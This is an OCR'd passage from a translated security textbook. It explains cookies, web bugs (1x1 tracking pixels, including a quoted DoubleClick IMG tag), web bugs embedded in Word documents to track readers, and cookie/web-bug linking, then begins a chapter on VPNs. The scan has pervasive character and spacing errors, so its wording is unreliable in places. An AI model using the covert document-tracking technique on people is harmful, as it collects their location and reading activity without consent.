작성 자)는 원도우즈콤퓨터 의 모든 쿠키 들을 연시 하고 지 적할수 있는 프로그람을 만들어 
냈다. 

그 녀 자의 쿠키 보기프로그람은 일 반적 으로 부호화된 ID 값뒤 에 숨겨 지 는 어 떤 개 인 
정 보를 제 외 하고는 쿠키내 의 쓸만한 모든 정 보들을 다 연시할수 있 다. 그림 14 一 1은 무 
키 의 보기프로그람을 동작상태 로 보여 준다. 

알수 있는바와 같이 무키 보기 프로그람은 windows / cookie 디 렉 터 리 내 에 현재 109개 의 
무키가 있다는것을 보여 준다. 그 녀자는 사용자가 필요 없는 모든 쿠키들을 제거하기 
쉽 게 삭제 ( Delete ) 특징 을 보기 프로그람에 첨 부하였 다. anyuser @ napster [2]. txt 라는 무키 를 선 
택 하였 을 때 사용자는 그 무키 파일 은 napster . com 에 서 왔고 이 봉사기 에 만 유효하다는것 
을 알수 있다. 쿠키 를 보낸 Web 싸이트가 명백치 않다면 사용자는 그 특별한 쿠키 가 실 
지 로 필 요한가를 결 정 하기 위하여 그 쿠키 를 보낸 령 역 또는 IP 주소로 갈수 있 다. 그렇 
지 않으면 그것을 삭제할수 있다. 다음에 Data Value 가 02 b 07 로 설정된것을 볼수 있는데 
그것 은 자기 자신의 특수한 正)이 다. 이 수자와 문자들은 사용자가 Napster 양식 에 이 미전에 
기 입 한 어 떤 적 절 한 정 보를 유지 하고 있는 Napster 봉사기 자료기 지 와 호상작용한다. 다음 
에 창조날자 (creation date ), 종결 날자 (expiration date ), 두 날자사이 평가시간을 볼수 있 다. 
또한 이 무키 가 10년 지 속할것 이 라는것 을 알수 있 다. 무키보기프로그람에 는 32비 트 2진 
수로 표시된 종결날자가 있다. 마지막으로 보안문제에 관한 작은 창이 있는데 그것은 기 
정값이 No 로 설정 된다. 
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그림 14-1. 카렌의 쿠키보기프로그람 


쿠키의 긍정적인 점 


무엇보다먼저 무키의 목적은 사용자의 검색리력에 있는 자취를 보존하는데 있다. 사 
용자가 무키를 리 용하는 싸이 트에 접근할 때 255 byte 까지의 정보가 사용자의 열람기에 
전송된다. 다음번에 사용자가 그 싸이트를 방문하면 무키는 그 봉사기 로 다시 전송된다. 
무키는 사용자가 보았거나 사용자의 보기패턴이 이전의 방문들에 기초하는 폐지들의 목 
록을 포함할수 있다. 쿠키를 리용하여 싸이트는 사용패턴들을 추적하고 사용자들이 그 
싸이트에로 접속할 때 연시되는 정보를 주문화할수 있다. 

둘째로, 무키는 정보자원을 판매업체에 제공할수 있다. 인터네트무키를 리용하여 
직 결 판매 업 체 들은 특정 고객 들의 요구와 관심 사로 되 는 광고를 노릴 수 있 다. 무키사용 
에서는 소비 자와 판매 업체 가 둘다 유리하다. 판매 업체들은 보다 많은 구경군 
( click - through ) 들을 얻을수 있으며 한편 고객들은 관심이 있는 광고만 볼수 있다. 또 
한 쿠키 는 반복되 는 광고를 방지한다. Focalink 와 Double Click 와 같은 인 터네 트상업회 
사들은 인 터네 트사용자들이 갈은 광고를 다시 는 보지 않도륵 무키 를 실 행한다. 또한 
무키 는 인 터네 트사용자들의 Web 써 핑 (Web surfing ) 습관을 시 험하여 판매 업 체 들이 소비 
자들의 행 동을 더잘 리해할수 있도록 한다. NCR , Inc . 와 Sift , Inc . 와 같은 고등자료조 
사회 사들은 쿠키파일 을 통하여 고객 들에 대 한 정 보를 분석 하고 모든 고객 들의 요구를 
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보다 훌륭히 충족시킬수 있다. 

직결주문체계는 무키를 리용하여 사용자가 사려고 하는것을 상기시켜 준다. 실례로 
만일 어떤 고객 이 한 싸이트에서 사려는 책을 찾느라고 시간을 보내는데 갑자기 련결이 
끊어 졌다고 하자. 고객은 후에 그 싸이트에 다시 돌아 올수 있는데 그 항목은 여전히 
자기의 장바구니에 남아 있게 된다. 

싸이 트개 별 화도 역 시 무키 의 다른 하나의 리 점 이 다. 어 떤 사람이 CNN.com 싸이트에 
와서 체육소식은 전혀 보지 않으려 한다고 하자. CNN.com 은 그 사람에게 이것을 선택적 
으로 취함수 있도록 한다. 그때부터 계속(무키가 끝날 때까지) 그 사람은 CNN.com 에서 
체육소식을 보지 않게 된다. 

인 터네 트사용자는 무키 를 자기 의 통과암호와 사용자 正)를 보관하는데 사용할수 있 으 
며 따라서 다음번에 그 Web 싸이트에 접속하려고 할 때는 그 통과암호화사용자 正)를 입 
력하지 않아도 된 다. 그러 나 쿠키 의 이 기 능은 콤퓨터 가 다른 사용자들속에 공유되 면 보 
안위험 으로 될 수 있 다. Hotmail 이 나 Yahoo 는 자기 전자우편사용자들에 게 보다 빠른 접 근 
을 제 공하기 위하여 이 런 형 태의 무키 를 사용하는 싸이트들이 다. 

쿠키는《전자상업거래의 <무키피물〉인상박멸》에 서술된 리점을 가지고 있다. 무 
키 를 리용하여 특정한 고객 들이 요구하고 관심 을 가지 는 광고들을 묶어 줄수 있 다. 이 것 
은 수백 가지의 불편하고 불필요한 광고들을 보지 않게 하는것으로 하여 사용자들에게 유 
리 하다. 쿠키 는 반복되 는 배 너 ( banner ) 광고를 막는다. 또한 쿠키 의 리 용으로 회 사들은 고 
객 들의 행동습관을 더잘 알수 있다. 이 것은 판매 업 체 들이 대 부분 고객 들의 요구를 만족 
시킬수 있게 한다. 무키는 그 특정콤퓨터상의 사용자의 싸이트에 보관된다. 무키를 불가 
능상태 로 하기 는 쉽 다. Internet Explorer 4.0 에 서 Internet Options 의 View 를 선택 하고 
Advanced 태 브를 클릭 하고 Disable All Cookies 선택 항목을 클릭하면 된 다. 

쿠키의 부정적인 점 


쿠키기 술의 리용에 서 주되 는 우려 는 보안과 사적 비 밀 문제 이 다. 일 부 사람들은 쿠키 
가 보안위험이고 사적비밀에 침입하며 인터네트에 위험하다고 믿는다. 무키가 그러거나 
말거나 륜리도덕은 사용자에 대하여 어떻게 정보가 수집되고 무슨 정보가 수집되며 이 
정보가 어떻게 쓰이는가 하는데 기초한다. 사용자는 Web 싸이트에 접속할 때마다 봉사제 
공자，조작체계，열람기형태，모니터특성， CPU 형태, IP 주소，마지막으로 접속한 봉사기와 
갈은 정보들을 거저 넘겨 줄것이다. 

무키를 오용하는 좋은 실례는 사용자가 콤퓨터를 다른 사용자와 공유하는 경우이다. 
실례로 인터네트카페에서 사람들은 콤퓨터의 하드구동기에 보관된 앞선 사용자의 쿠키파 
일을 들여다 보아서 그 사용자에 대한 기밀정보를 알아 낼수 있다. 

이런 리유로부터 Web 개발자는 무키파일을 오용하지 말며 기밀로 간주되는 정보는 
무키파일 에 보관하지 않는것 이 아주 중요하다. 누구의 사회 안전번호，어머 니의 처 녀때 이 
름，신용카드번호와 갈은 정 보를 무키 에 보관하는것 은 인 터네 트사용자들에 게 위 협 으로 
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된 다. 

쿠키가 직결상업과 Web 사용자들에게 미치는 불리한 점을 가지고 있지만 거기에는 
한계가 있다. 쿠키가 무엇을 할수 있는가에 대한 여러가지 신화들이 있기때문에 다음과 
같이 무키 가 할수 없는것들을 지적해 둘 필요가 있다. 

• 사용자의 하드구동기 로부터 정보의 절도 또는 파손 

• 하드구동기 를 파괴하는 비 루스설 치 

• 한 싸이트에서 다른 싸이트에로의 자취 이동 

• 허가없이 신용카드번호를 랄취하는것 

• 다른 사용자의 콤퓨터 에 로 접근하는것 

• 소비 자가 자발적으로 그런 정보를 제공하지 않는 한 이름，주소，기 타 다른 정보 
들을 추적하는것 

2000년 1월 27일 캘리포니아주의 한 녀성은 비법적으로 소비자들의 개인정보를 엄어 
서 파는 Web 광고상점 을 고소하면서 Double Click 회 사에 대 해 소송을 제 기하였 다. 그 법 
소송은 Double Click 회 사는 무키 라는 교묘한 콤퓨터 추적 기 술을 채 용하여 인 터 네 트사용자 
의 신원을 확인하고 사용자들이 Web 을 돌아 볼 때 그들의 승낙없 이 개 인정 보를 수집한 
다고 주장하였다. 2000년 6월 Double Click 회사는 미국가족의 90%의 이름，주소，소매 구 
입 습관 등의 자료기 지 를 관리 하는 직 접 상업 봉사회 사인 Abacus Direct Corporation 회 사를 
사들였다. Double Click 회사의 새로운 사적비 밀 방책은 회사가 소비 자들의 프로파일(사용 
자의 이름，비밀번호를 비롯한 사용자고유정보-역주)을 주는 자료기지를 구축하기 위하 
여 쿠키 에 의하여 수집된 정 보를 리용하도록 계 획을 세운다는것을 명백 히 보여 주었 다. 
Double Click 회 사는 고객 들의 프로파일 을 수집 하면 직 결 광고를 부류별 로 더 잘 묶어 놓을 
수 있으며 그렇게 되면 그들의 직결활동이 더욱 활발해 지고 광고는 보다 효과성을 가지 
게 된다고 하면서 자기들의 프로파일수집활동의 정당성을 옹호하였다. 그리고 그것을 
《개별화》라고 불렀다. 

전자사적비밀정보쎈터는 《Double Click 는 현재까지 대략 10억명의 인터네트사용자 
의 프로파일들을 수집 하였 다.》고 언급하였 다. 소비 자들은 이것 으로 하여 Double Click 가 
생각지도 않게 사용자들의 개인정보에 너무 많이 접근할수 있게 한다고 생각하였다. 소 
비자들은 오랜기간 자기들이 비합법적인 Double Click 쿠키를 받고 있다는것을 깨닫지 못 
하였다. 전자통신사적 비밀법 과 보관된 유선통신 및 거 래 기록접 근법과 같은 련방법조항들 
을 위반하였다는 기록도 있다. 2000년 3월 Double Click 는 사용자들이 모르게 그들의 정 
보를 수집한 실책 에 대 하여 인정 하였다. 

많은 사람들은 특정한 정 보를 접 수하든 거 절 하든간에 가장 좋은 사적 비 밀 방책 은 소 
비자들자신이 《선택》할수 있게 하는것일것이라고 말한다. 《 Web 자료의 비밀보존을 위 
하여》라는 기 사에 의 하면 텍 싸스주의 플라노시 에 있는 Electronic Data System ( EDS ) 회 
사가 이 분야에 서 가장 우수하다고 한다. EDS 의 전자상업 거 래방책국장 빌 파울러 스 
(Bill Poulous ) 는 《회사들은 자기들이 개 인정보를 수집하고 있다는것을 소비자들에게 
이 야기하여 야 하며 그것 으로 무엇 을 하려 는가를 알려 주고 자기 들의 자료를 선택하거 
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나 그 자료의 수집을 막을수 있는 기회를 주라》고 이야기하였다. 그는 또한 그 방책 
들은 일반사람들이 그것을 알고 리해하고 그대로 할수 있게끔 되여야 한다고 덧붙여 
설명 하였다. 


Web Bug 란 무엇인가 

Web bug 는 누가 Web 폐지 나 전자우편을 읽 고 있는지 감시 하기 위 하여 설계된 Web 페 
지 나 전자우편상의 도형 이다. 쿠키 와 같이 Web bug 는 싸이 버 공간에서 Web 싸이 트와 광고 
자들이 방문자의 행처를 추적하는것을 도와 주는 전자태 그이 다. 그러 나 Web bug 는 필수 
적으로 페지상에서 눈에 보이지 않을 정도로 매우 작으며 그 크기는 대략 문장끝의 종지 
부만 하다. Melissa 비루스제 작자의 추적으로 하여 잘 알려 진 www.privacyfoundation.org 의 
기 술경 영 책 임 자 리 차드 스미 스 (Richard Smth) 는 Web bug 기 술을 공개 시 키 는 공적 을 세 웠 
다. 스미스는 다음과 같이 말하였다. 《전형적 인 투명화상이고 크기는 가로 1화소，세로 
1 화소인 Web 폐 지 나 전자우편통보문을 누가 읽 는가를 감시 하기 위하여 설계 된 Web bug 는 
Web 페지 나 전자우편상의 하나의 도형 이 다.》 Meconomy.com 의 기술경 영책 임 자인 크라이 
그 나댄 (Craig Nathan) 은 말하기를 1X1 화소 Web bug 는《 봉화 같다. 그래서 매번 Web 페 
지를 때릴 때마다 하나의 핑을 전송하든가 또는 <Hi> 하면서 봉사기에 응답을 보내는데 
이것은 내가 누구이고 내가 어디에 있다는것이다.》고 하였다. 

대 부분의 콤퓨터 에 쿠키 가 있 는데 그것 은 배 너 광고(홈폐 지 에 띠모양으로 만들어 붙 
이는 인터네트상의 광고-역주)가 연시되든가 사용자가 하나의 직결봉사에 서명할 때 하 
드구동기에 배치된다. 상식 있는 Web 봉사기들은 배너광고를 보면 자기가 추적 당하고 있 
다는것을 알아 차린다. 그러 나 사람들은 Web bug 를 볼수 없고 반무키 려과기들은 그것을 
포착하지 못할것 이 다. 그래 서 Web bug 는 배 너 광고가 아직 없 는 직 결 지 역 이 나 추적 되 리 라 
고 예 상치 못하는 싸이트들에 서 봉사기 들을 추적하며 알아 낼수 있 다. 

Http://www.investorplace.com 에서 Web bug 에 대한 실례를 찾아 볼수 있다. 그 페지의 
득대 기 에 Web bug 가 위 치 하여 있 다. Internet Explorer 에 서 Source 메 뉴의 View 또는 
Netscape 에 서 는 Page Source 메 뉴의 View 를 선 택 하여 동작되 고 있 는 코드를 볼수 있 다. 아 
래에서 보는바와 같이 코드는 “Investor Place” 방문자에 대 한 정보를 광고회 사 Double 
Click 에 제공한다. 

<IMG SRC=” http:ad.doubleclick.net/activity;src=328142; 
type=mmti; cat=invstr;ord=<Time>? ” WIDTH=1 HEIGHT=1 
BORDER=0> 

Web 폐지상의 바그들에 대한 검사도 가능하다. 일단 그 폐지가 적재되면 그 페지의 
원천코드를 보라. 속성 값들이 WIDTH=1, HEIGHT=1, BORDER=0( 또는 WIDTH= ” 1” , 
HEIGHT=” 1” , B0RDER=” 0” ) 인 IMG 태그가 있는 폐지를 찾아 보자. 이것은 작고 투 
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명 한 화상의 존재를 의미 한다. 만일 이 태그가 가리키는 화상이 현재의 봉사기 가 아니 라 
다른 봉사기 에 있다면(실례 로 IMG 태 그가 SRC=” http://” 라는 본문을 포함한다면) 그것은 
Web bug 와 아주 류사하다. 

사적비밀과 다른 Web Bug 문제 


Double Click 나 Match Point 와 같은 광고망들은 세계의 여 러 지역은 물론 인터 네트의 
여러 지역의 특별한 Web 싸이트들을 접근하는 수많은 사람들의 《독립적인 구좌만들기》 
를 개 발하기 위 하여 Web bug (《 인터 네 트태 그》라고도 함)들을 리 용한다. 광고업 체 들은 
또한 Web 싸이트내에서 페지보기에 대한 통계를 낸다. 이것은 내용의 효과성을 계획하고 
운영하는데 도 매 우 도움이 된다. 왜 냐하면 그것 이 목적하는 시 장정 보의 조사를 제 공하기 
때문이다(실례로 어떤 싸이트에 대한 사용자들의 많은 방문). 이와 갈은 생각으로 하여 
광고망들은 사용자가 방문한 싸이트의 개 인프로파일 을 만드는데 Web bug 를 리 용할수 있 
다. 이 정보는 자료기지봉사기에 넣어 두고 해당 사용자가 보게 되는 광고의 형태를 결 
정하는데 사용될수 있다. 이것은《직접적인 광고》를 의미한다. 

전자우편통보문에 리 용되 는 Web bug 는 보다 더 해 로울수 있 다. Web 기 초전자우편 
에서 Web bug 는 과연 그리 고 언제 전자우편이 읽혀 질것 인가를 결정 하는데 리 용될수 
있다. Web bug 는 수신자가 정보가 로출되는것을 바라든 바라지 않든 상관없이 수신자 
의 IP 주소를 제 공할수 있다. 기 관내 에서 Web bug 를 보면 통보문이 몇 번이 나 전송되 고 
읽혀 질것인가 하는 착상을 줄수 있다. 이렇게 되면 직접거래에 도움이 되여 광고에 
서 효과가 나타난것만큼 성과를 가져다 줄수 있을것이다. Web bug 는 장크우편 (junk 
e-mail: 인 터 네 트상에 서 수많은 사람들에 게 그들의 의 사와는 관계 없 이 일 방적 으로 전 
달되는 대량의 광고성전자우편. 일명 spam mail 이라고도 함-역주)통보문을 본 사람을 
람지 하는데 리용될 수 있다. 통보문을 보지 않은 사람은 앞으로의 우편목록에 서 제 외 
대상으로 된다. 

쿠키의 도움으로 Web bug 는 를퓨터，열어 본 페지，방문시작시간 그리고 기타 세 
부들을 확인할수 있다. 광고봉사를 제공하는 회사들에 전송된 그 정보는 결과적으로 
누군가 무엇을 사려고 또는 어떤 다른것을 읽 어 보려고 같은 광고망의 다른 회사의 페 
지 를 방문하는가를 결 정하는데 리용될 수 있 다. 《 그것 은 직 결 보관고에 서 소비 자들의 
활동을 수집 하는 한가지 방법이다.》라고 Double Click 의 기술담당책임부사장 데이비드 
로젠 블러 트 (David Rosenblatt) 는 말하였 다. 그러 나 충실 한 고객 감시 자인 Web bug 와 다른 
추적 도구들은 직결콤퓨터사용자들의 사적 비밀과 자립적 인 활동에 위 협을 증대시키 고 
있 다. 

Web bug 를 Microsoft Word 문서 에 첨 부할수도 있 다. Web bug 를 리 용하여 문서 작성 자 
는 자기 의 문서 가 어 디 에서 몇번 읽혀 지 는가를 추적할수 있다. 또한 그 감시 자는《 바 
그가 붙은》문서가 어떻게 한사람에게서 다른 사람에게로 또는 한 기관에서 다른 기관으 
로넘어 가는가를 감시할수 있다. 
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Word 문서 에 서 Web bug 를 리 용하면 다음과 같은것 을 할수 있 다. 

• 신용문건들의 회사로부터의 류출람지 및 추적 

• 회보 및 보고서들의 가능한 저작권위반추적 

• 판권배포의 감시 

• 한 Word 문서 에서 새 로운 문서 로 복사될 때 인용되 는 본문의 추적 

Web bug 는 문서가 원격 Web 봉사기에 배치되는 화상파일에 련결되도록 하는 
Microsoft Word 의 능력 에 의 하여 만들어 질 수 있 다. 실 제 화상이 아니 라 Web bug 의 
URL 만이 문서에 보관될수 있으므로 Microsoft Word 는 개개의 문서에 대하여 문서가 
열릴 때 마다 Web 봉사기 로부터 화상을 불러 와야 한다. 이 화상련결 특성 으로부터 언제 
어디서 문서파일이 열리는가를 감시하도록 원격봉사기를 적당한 위치에 배치하여야 한 
다. 봉사기는 문서가 열리는 콤퓨터의 IP 주소와 호스트 이름을 알고 있다. 호스트 이름은 
표준 적으로 기관의 회사이름으로 될것이다. 사용자의 집에 있는 콤퓨터의 호스트 이름 
은 보통 그 사용자의 인 터 네 트 봉사제 공자 (ISP: Internet Service Provider) 의 이 름을 가진 
다. Microsoft Word 에서는 Web 화상의 련결기능을 제거하기 힘들므로 좋은 해결책이 있 
을상 싶지 않다. 워 드문서외 에 Web bug 는 Excel 2000 과 Power Point 2000 문서 에서 도 사 
용될 수 있다. 


Web Bug 와 쿠키의 동기화 


추가적 으로 Web bug 와 열 람기 무키 는 특별한 전자우편주소에 대 하여 동기 화할수 
있다. 이 계책은 Web 싸이트가 그 Web 싸이트로 그후에 들어 오는 사람들의 신원(다른 
개 인정 보도 포함)을 알도록 한다. 더 상세 히 설명하면 무키 가 해 당 사용자의 콤퓨터 에 
배치되면 원래 쿠키를 가지고 있던 봉사기만이 유일하게 그것을 읽을수 있다. 리론적 
으로 두개 의 서 로 다른 싸이트들이 사용자의 를퓨터 에 제 각기 특수한 쿠키 를 배 치 하 
면 그것들은 각각 각자의 쿠키에 보관된 자료를 읽을수 없다. 례를 들어 말한다면 한 
싸이트는 사용자가 최근에 다른 싸이트를 방문하였다는것을 알수 없다는것을 의미한 
다. 만일 그러 나 사용자의 콤퓨터 에 배 치 되 여 있는 쿠키 가 그 싸이트가 광고기 관봉사 
기 에 보낸 정 보를 가지 고 있고 그 기 관은 두 Web 싸이 트들에 의하여 다 리용된다면 
사태는 아주 달라 진다. 만일 이 싸이트들이 각각 자기들의 페지 에 Web bug 를 배 치 하 
여 광고기 관의 콤퓨터 로 돌아 오는 정 보를 보고하면 사용자에 대 한 상세한 정 보는 두 
개 의 쿠키파일 들과 관련된 사용자콤퓨터 에 보관된 정 보를 리용하여 광고기 관에 로 다 
시 전송될것 이 다. 이것은 사용자의 콤퓨터 가 두개의 싸이트들을 각각 방문한 콤퓨터 
로 확인되게 할것이다. 

다음과 같은 실례 가 이것을 더 정 확히 설명한다. Web 봉사기 인 보브가 Web bug 를 포 
함하고 있는 페지 나 전자우편을 열 때 《 투명한 GIF 화상》이 있는 봉사기 에 로 정 보가 
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전송된다. 전송되는 일 반정 보는 보브콤퓨터의 IP 주소，열 람기형태，연시되 는 Web 페지의 
URL , 화상의 URL , 파일이 접근한 시간 등을 포함한다. 또한 봉사기에로 전송되면서 보 
브의 사적비밀정보에 대부분의 위협을 줄수 있는 정보는 그의 콤퓨터에 있는 이미 설정 
된 무키값이 다. 

미리 정의된 주키의 성질에 따라 그것은 사용자이름과 통과암호로부터 전자우편 
주소와 신용카드정 보에 이 르기 까지 모든 정 보를 다 포함할수 있다. 앞의 실례 를 계 속 
들어 이 야기하면 보브는 광고기 관봉사기 의 투명한 GIF 화상을 포함하는 Web 싸이트#1 
을 방문하자 곧 쿠키 를 받을것 이 다. 보브는 또한 같은 광고기 관의 봉사기 의 투명한 
GIF 화상을 포함하는 Web 싸이 트#2에 갈 때 다른 하나의 무키 를 받을수 있 다. 그러 면 
두개 의 Web 싸이트들| 그 광고업 체 에 보고를 보내 고 있는 쿠키들을 통하여 보브의 
활동을 서 로 참조할수 있을것 이 다. 이 활동이 계 속되 면 광고업 체 는 보브의 개 별적특 
성을 나타내는 정보는 물론 보브와 갈은 부류의 사람들의 취미와 습관 갈은 정보들을 
죽적 할수 있 다. 

무키 코드가 표준화되 면 각이 한 봉사기 들사이 에 서 무키 와 Web bug 가 동기 화됨 으로 
써 월드와이드 Web 전반에 걸쳐 정보를 공유할수 있는 기술적가능성이 주어 지게 된다. 
만일 실지 그렇게 된다면 어떤 사람이 어떤 Web 싸이트를 방문하였다는 사실이 많은 
인터네트봉사기들을 통하여 전반적 으로 퍼지게 되며 사적 비밀의 침해는 끝이 없게 될 
것 이 다. 


결 론 


쿠키와 Web bug 의 기초에 대해서는 정의，내용，리용성，사적비밀우려，동기화 등을 
통하여 보여 주었다. 쿠키의 실제코드당 Web bug 들에 대 한 여 러 가지 실례 들은 독자들에 
게 그것 들을 확인하는 방법 을 배 워 주는데 도움이 되 도록 설명되 였 다. 무키 와 Web bug 들 
을 기 업 활동에 리용하는 긍정 적 측면들이 론의 되 였 다. 또한 무키 와 Web bug 에 관련된 사 
적비밀과 다른 문제들이 시험되 였다. 끝으로 Web bug 와 쿠키의 동기화 (Word 문서 포함)가 
론의되였 다. 

그러 나 우리의 론의 는 쿠키 와 Web bug 들을 식 별하고 보관하며 오늘날에 사용하는것 
에 기 본적 으로 국한되 였 다. 쿠키 와 Web bug 메 타자료(자료에 대 하여 보관된 자료)를 사용 
하면 개 별적 사용자의 행동에 대 한 다량의 정 보를 여 러 콤퓨터 체 계 환경 에서 추적할수 있 
다. 언제 인가 우리는 쿠키와 Web bug 보관고에서 나오는 모든 변칙들과 소비 자경향을 조 
사하는 쿠키 및 Web bug 채 취 쏘프트웨 어 를 보게 될 것 이 다. 그러 니 우리 가 지 금까지 고찰 
한것은 빙산의 일각에 지나지 않을것이다. 
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제 1 5장. 가상개별망의 실현 


제임스 에스 털러 


가상개 별 망 ( VPN ) 들은 원격접 근과 소규모사무실 및 가정 사무실 ( SOHO ) 지원으로부터 
기 업 간 ( B 2 B ) 통신에 이 르기 까지 의 여 러 가지 목적 에 점 점 더 많이 리용되 고 있 다. 이 기 술 
이 리용되기 시작하자마자 거의 모든 기업들에서 VPN 들을 이런저런 형태로 리용하기 시 
작하였다. 기 업형식 이 나 시장에 관계 없이 VPN 들은 통신과 관련된 생활의 모든 령역을 
침투하고 있는것 같다. 통신을 확대해 야 할 일 련의 필요성 으로 하여 투자의 즉시 적 인 효 
과를 볼수 있도록 VPN 들을 도입할수 있다. 

각이한 제품들의 리용성과 그 범위가 주어 졌으므로 VPN 들의 실현은 그 어느 때보 
다도 쉬운것 이 다. 많은 경우에 VPN 들의 설치와 유지는 상대적 으로 쉽다. 회사들이 요구 
하는 많은 제품들을 보장하여야 하므로 VPN 제품들은 집적도가 높다. 그렇다고 하여 
VPN 들이 경로조정규약，접근조종수단 및 다른 인터네트운영기술들이 통합되여 뒤엉킨 
큰 환경에서도 단순하다는것은 아니다. 그러나 VPN 들은 본질상 통신가동환경의 또하나 
의 형식이며 또 그렇게 되여야 한다. 

여 러 가지 제품들과 일반적 으로 알려 진 VPN 들의 응용프로그람뿐아니 라 기술에 대 한 
호기심과 안전한 통신에 대한 약속으로 하여 사용할 규약선택에서 혼란만이 일어 난다. 
선택할수 있는 여 러 가지 표준들과 류형 의 VPN 들이 있으며 매 표준과 류형 은 자기 의 속 
성 들을 가지 고 있 으므로 해 당 대 안의 각이한 요구를 만족시 킨다. 린 접기 술과는 달리 망 
의 여러가지 해결조건들을 만족시킬수 있는 속성들을 가진다. 물론 매 판매업체는 그 표 
준에 대하여 해석을 가하며 그것을 적용하는 방법도 동일한 토대에서 망을 구축하는 다 
른 사람들과는 다를수 있다. 그럼에도 불구하고 VPN 들은 널리 퍼졌으며 놀라운 속도로 
파급되고 있다. 앞으로 시간이 흐르고 기술이 발전함에 따라 이에 대하여 보다 더 크게 
기 대 할수 있 을것 이 다. 

VPN 들은 전통적인 광지역망들을 모방하는 통신구성방식을 제공할수 있다. 대체로 이런 
응용프로그람에서는 인터네트를 리용하여 단일한 접속만 실현하여도 많은 원격싸이트 및 
사용자들과 자료를 교환할수 있을것이다. 인증，암호화 및 방책을 리용하고 최종적으로는 
인터 네 트를 통하여 Web 이 라는 가상통로를 구축함으로써 여 러 가지 가상망들을 세울수 있다. 

초기 VPN 의 견지 에서는 인터네트가 신뢰성 이 없고 일관성 이 없었다. 최근까지도 인 
터네 트의 능력 을 믿 지 못하였 다. 인 터네 트접 속은 종종 성 공하지 못하였 고 자료전송속도 
는 파동이 심하였다. 많은 사람들이 대체로 인터네트를 하나의 겉치레나 하는 보안이 없 
는 망으로 인정 하였 다. 인 터네 트에 대 한 확신이 부족한 관점 에 서 보면 임 무가 중요하고 
시 간을 엄 수할것 을 요하는 정 보통신들을 성 과적 으로 인 터네 트를 통하여 실현할수 있겠는 
가 하는 우려 는 보안과 관련된 문제 에 서 더 욱 심하게 나타났다. 통신속도가 너 무 느려서 
리용할수 없 었 다면 안전담보에 대 하여 누가 신경 을 썼겠는가. 인 터네 트에 대 한 요구가 
전반적 으로 높아 지 면서 그 하부구조에 대 한 요구도 높아 졌 다. 인 터네 트는 일 반적 으로 
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훨씬 더 신뢰성이 있으며 더 높은 자료전송속도가 가능해 지고 있다. 더 많은 인터네트 
접근점들이 속도를 높이면 높을수록 더 좋은 신뢰성과 앞선 울타리기술이 모두 결합되여 
인터네 트에 기 초하고 있는 광역 통신용 VPN 들의 덕 을 보도록 사람들의 마음을 돌려 세 우 
게 되였다. 

VPN 의 도입 을 반드시 확대해 야 한다는 견지 에 서 이 장에 서 는 흔히 생 각하는 방식 
과는 다른 방법 으로 VPN 을 리용할수 있는 일부 문제 들을 언급한다. 여기 에서 설명하 
는 내용은 VPN 을 요란히 선전하는 사람들이 주로 제창하는 방법으로서 새로운것 이 아 
니나 그렇다고 하여 VPN 실현에서 흔히 볼수 있는 그렇게 일반적인것도 아니다. 이 장 
에서 는 각 기 관들이 자기 들이 가지 고 있는 환경 및 기 술적조건들을 효과적 으로 리용하 
여 어떻게 자체의 망의 기능을 훨씬 높일수 있겠는가 하는 일부 문제들을 고찰해 보려 
고 한다. 


VPN 의 기본우월성 


기 관들에서 VPN 을 전개하는 리유가 몇 가지 있다. 여 기 에는 자금절 약과 기능제거 및 
접근의 증대와 같이 단순한 목적들이 속할수 있다. 또한 엑스트라네트망접근과 그에 의 
하여 얻 을수 있 는 정 보들에 대 한 통제 에 보다 큰 리유가 있 을수 있 다. 

어 떤 경 우에 도 VPN 은 현존 인 터네 트접 속을 리용하는 정 보통신을 빨리 설 치하게 하 
며 보안과 관련된 봉사의 유연성을 보장한다. 그 속성들가운데서 그 어느것도 종래의 통 
신에서처 럼 특히 프레 임중계 (Frame Relay ) 에서처 럼 그렇게 뚜렷하지 못하다. 이 두 기술 
을 비교하기 어려운것은 일단 가상회로들을 통과하면 그 류사성이 달라 지기때문이다. 
그러 나 시 간과 안전성은 론의 할수 있다. 

프레임중계 ( FR ) 망들의 배치，특히 제공자와 련계가 없는 새로운 FR 를 배치한다는것 
은 그야말로 시 간랑비 로 될 수 있 다. 그 통신망을 계 3자가 관리하는 경 우 새 로운 영 구가 
상회 로 ( PVC ) 에 주소공간을 할당하고 이 회 로를 경 로조정체계 에 포함시키면 작업 량이 너 
무 많아 질수 있다. 또한 모든 PVC 에는 비용이 드는것 이 다. 

보안과 관련하여 보면 통신망전송자료의 비밀성은 통신제공자에 직접 의존하게 
된 다. 자료를 광대역망 ( WAN ) 에 보내 기전에 자료소개자가 예 방대 책 을 세 우지 않으면 
그 정 보에 대 한 보호는 통신사업 자와 다른 통신사업자와의 호상련결 에 서 보장하게 되 
여 있다. 

시간은 돈이다 

보는바와 같이 프레 임 중계 와 비 교하면 VPN 은 빨리 설 치할수 있 으며 품을 얼 마 들이 
지 않고 해 체할수 있 다. 실례 로 인터네 트접 속 및 VPN 설 비 를 가지 고 있는 한 회 사가 봉 
사를 받기 위하여 다른 기 관과 림 시 련계 를 가지 고저 한다고 하자. 현재 수천개 의 다른 
VPN 들이 여 러 원격싸이트 및 사용자들과 동일하게 접속되여 가동중에 있을수 있다. 그 
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렇지만 물리적교체와 설비구입은 하지 않아도 되며 다만 다른 하나의 싸이트를 포함할수 
있게 설정을 변경하면 된다. 최근에는 이렇게 하자면 제기된 VPN 의 매 종단점의 구체적 
인 설정이 필요하다. 지금 많은 제품들은 VPN 들의 원격관리를 할수 있는 종합적인 관리 
능력을 가지고 있다. 일부 제품들은 VPN 에서 가동하며 다른 제품들은 SNMPv 3 과 갈은 
관리 기 준을 리용하여 인 터네 트관리 를 안전하게 한다. 

통신을 거의 순간적으로 절단 및 구축하는 능력이 주어 졌으므로 끊임없이 변하 
는 통신환경 에서 VPN 의 우월성은 확고하다. 일 반적 으로 한 기 업은 정 보교환을 위하 
여 다른 한 기업과 림시접속을 요구하게 된다. 광고회사들，자문회사들，정보중계자들， 
병참기관#, 제조업체들은 모두 자기 고객들과 동업자들과의 통신을 요구하거 나 통신 
을 리용할수 있다. 제 한된 장소에 서 그런 통신을 빨리 실 현 할수 있는 능력 이 있 다면 
매우 짧은 기간내에 통신이 진행될수 있다. 일단 그러한 접속에 대한 필요가 없으면 
본래의 상태로 된다. 통신계약，투자관리 혹은 연장에 대한 어떤 우려가 없이도 VPN 
은 해제될수 있다. 

보안도 역시 돈이다 

VPN 이 보장하는 보안은 명 백한것 같다. 일 반적 으로 VPN 접 속은 인터네 트상에 서 이 
